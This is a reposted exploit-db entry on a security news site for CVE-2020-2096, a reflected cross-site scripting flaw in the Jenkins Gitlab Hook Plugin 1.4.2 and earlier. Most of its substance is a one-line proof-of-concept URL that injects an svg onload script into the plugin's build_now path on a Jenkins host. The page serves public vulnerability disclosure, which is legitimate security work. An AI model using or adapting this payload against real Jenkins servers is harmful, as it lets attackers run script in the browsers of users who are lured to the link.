Jenkins Gitlab Hook Plugin 1.4.2 – Reflected Cross-Site Scripting – Digitalmunition




Exploit 1579172955_spider-orange.png

Published on January 16th, 2020 📆 | 2139 Views ⚑

0

Jenkins Gitlab Hook Plugin 1.4.2 – Reflected Cross-Site Scripting

# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
# Exploit Author: Ai Ho
# Vendor Homepage : https://jenkins.io/
# Effective version : Gitlab Hook Plugin 1.4.2 and earlier
# References: https://jenkins.io/security/advisory/2020-01-15/
# CVE: CVE-2020-2096

# PoC:
http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E
            

https://www.exploit-db.com/exploits/47927

Tagged with:



Leave a Reply ✍


loading...